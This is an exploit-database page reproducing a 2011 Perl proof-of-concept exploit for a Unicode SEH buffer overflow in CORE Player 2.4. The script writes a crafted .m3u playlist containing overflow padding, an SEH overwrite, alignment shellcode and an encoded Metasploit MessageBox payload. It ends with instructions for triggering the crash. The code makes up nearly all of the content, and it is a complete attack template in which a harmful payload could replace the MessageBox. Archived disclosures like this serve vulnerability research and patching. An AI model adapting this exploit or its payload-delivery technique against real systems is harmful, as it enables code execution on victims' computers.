Vulners
Lucene search
CORE Multimedia Suite 2011 Buffer Overflow
`# Exploit: CORE Multimedia Suite 2011 CORE Player 2.4 Unicode SEH Buffer Overflow Exploit (.m3u)
# Date: 18.03.11
# Author: Rh0[at]z1p.biz
# Software Link: http://mjm-soft.zzl.org/CORE_MMS_2011.zip
# Version: 2.4
# Tested on: WinXP Pro SP3 EN (VirtualBox)
## The application does not crash immediately:
## Open Core Player, go to FILE->LOAD LIST, load the playlist and
## close the program. ==> Reopening it triggers the buffer overflow. <==
## Seems that the playlist gets saved under Load.m3l in the
## programs directory, and everytime the player is opened, the malicious
## playlist triggers the overflow.
## To be able to start the player normally, remove the Load.m3l file
print " [*] Core Player 2.4 Unicode SEH Buffer Overflow Exploit [*] \n\n";
$junk = "C:\\";
$junk .= "A" x 533; # 536 bytes until nseh overwrite
$nseh = "\x90\xcf"; # becomes nop; add bh,cl (pad)
$seh = "\x59\x4a"; # pop;pop;ret; unicode compatible, 0x004a0059 @ core player.exe
## venetian shellcode
$vSC =
"\x71". #
"\x58". # pop eax (eax should then be 0x0012CC14)
"\x71".
"\x5d". # pop ebp
"\x71".
"\xbb\x08\x41". # mov ebx,0x41000800
"\xf8". # add al,bh
"\x71".
"\xbb\x04\x41". # mov ebx,0x41000400
"\xfc". # add ah,bh (eax should now point to the payload)
"\x71".
"\x50". # push eax
"\x71".
"\xc3"; # return
## msf MessageBox alpha_mixed + unicode upper
$payload =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAI".
"AXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTIK0IKXNXYT".
"0L4QJPJPJPJPJPJPJPJPJPJPJPJQ3PCPCPCPCQ3P7PRQIQZQ1PXR0P0Q1P0Q1RKQ1Q1PQP".
"2Q1PBP2Q2PBP0PBPBQ1Q2PXR0P8Q1Q2CEPJQ9PXPYPXRKPMPKPNP9QBPTQ5CDQ9RDR4RQP".
"ZRRPOQ2PCPGPEC1PKT9R2Q4PLPKPQQQPPP0PLPKQ3Q6QDPLPLPKR1C6PGRLPLPKPRQVPVQ".
"XPNRKPCPNPQP0PNRKPVPVQ5QXPPPOQ7C8R2PUPXCCR1Q9PEPQQHR1PKPOQHC1PCR0PNRKR".
"0RLR1P4PGQDPLPKQ3T5Q7PLPLPKPVP4PQP8PRPXPCP1QHQZPNRKPQPZPTQHPLPKQ3QZPGP".
"PPCP1PZPKPKQCQ7Q4PQPYPLPKPGQ4PLPKPGT1PZPNQ5C1PIROQFR1PKRPPKPLPNPLPOCDQ".
"9R0R2QDQ3P7Q9PQQJROPTPMR6QQPOP7PZPKQJPTQ7PKPCPLQ7R4Q7QHQ3Q5PIT1PNRKR0Q".
"JPVQ4QFQQQJPKPCQFPLPKPVRLPPPKPLPKPQPJQ7RLPGT1PZPKPNRKQFQTPNRKR6QQQJPHP".
"KP9R2QTQ7R4PGRLPCR1POP3POQ2R4PHPVQ9PNP4PORYQHQUPLPIPIPRQ5P8PNRNR0PNR4P".
"NPXRLR0PRPMP8PMPOQ9ROPKPOQ9ROPOCIPCCEQFC4PMRKQ3PNQHR8QJPBR2QCPKP7Q5PLR".
"6Q4QFP2PZQ8PLPNPIROQ9ROPIROPOCIPQR5Q7T8Q5P8PPRLPPRLQ5RPPRQQPQCHR0P3R0P".
"2R4RNPEP4Q5P8R4P5PCQ3R2PER0T2PLQ8R1PLPGQDQ5QJPNQYPXQVPRCFPKPOQFP5Q7CDP".
"KP9PKCBQFP0POPKPNPHQ9P2PPPMPMRLPKP7PEPLPGPTPQQ2PICHQ5P1PKPOPKPOPKPOPQT".
"8Q5P4PRCHPERPPQP0Q3PXPPROQ5P9QDP4PEP5PEP8PRQUPPT8R0T0QBPLPPP1Q9PKPLQ8P".
"CRLR1P4PVC9PMQIQHRCR1RXR1PHPERPPET0PQP0R2Q8Q3PYR2QDPET0Q5RZPPC8R0T8R0R".
"PPRPLPPROR0RHPQT4R0C5PERPPPQ5R1RXPRPNR2PIPRC3PPROQBPHQBQUQ3T8R1P0PPPUP".
"EP8Q3QEQDP2Q5RPQFP3PCR8R2RPPRPLPEP1R0RYR2PHPPROQ3Q2QBQ5PERPR1CHPGPPPEC".
"JR1P0R0Q3PPP1PIR9PNC8R0PLQFPDPET4PKP9PMP1QDRQPNP2QBPJPCRPQBRSPRT1R6P2Q".
"9ROPNP0QFR1POP0R6P0PKPOQ3C5Q7CHQ1Q1AA";
open(F,">exploit.m3u");
$buffer .= $junk.$nseh.$seh.$vSC.$payload;
print F $buffer;
close(F);
print " [*] Open Core Player\n";
print " [*] Load the playlist exploit.m3u \n";
print " [*] Close the program\n";
print " [*] Reopen it\n";
print " [*] A Messagebox should pop up.\n\n";
print " [*] Enter to continue [*] ";
<>;
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Mar 2011 00:00Current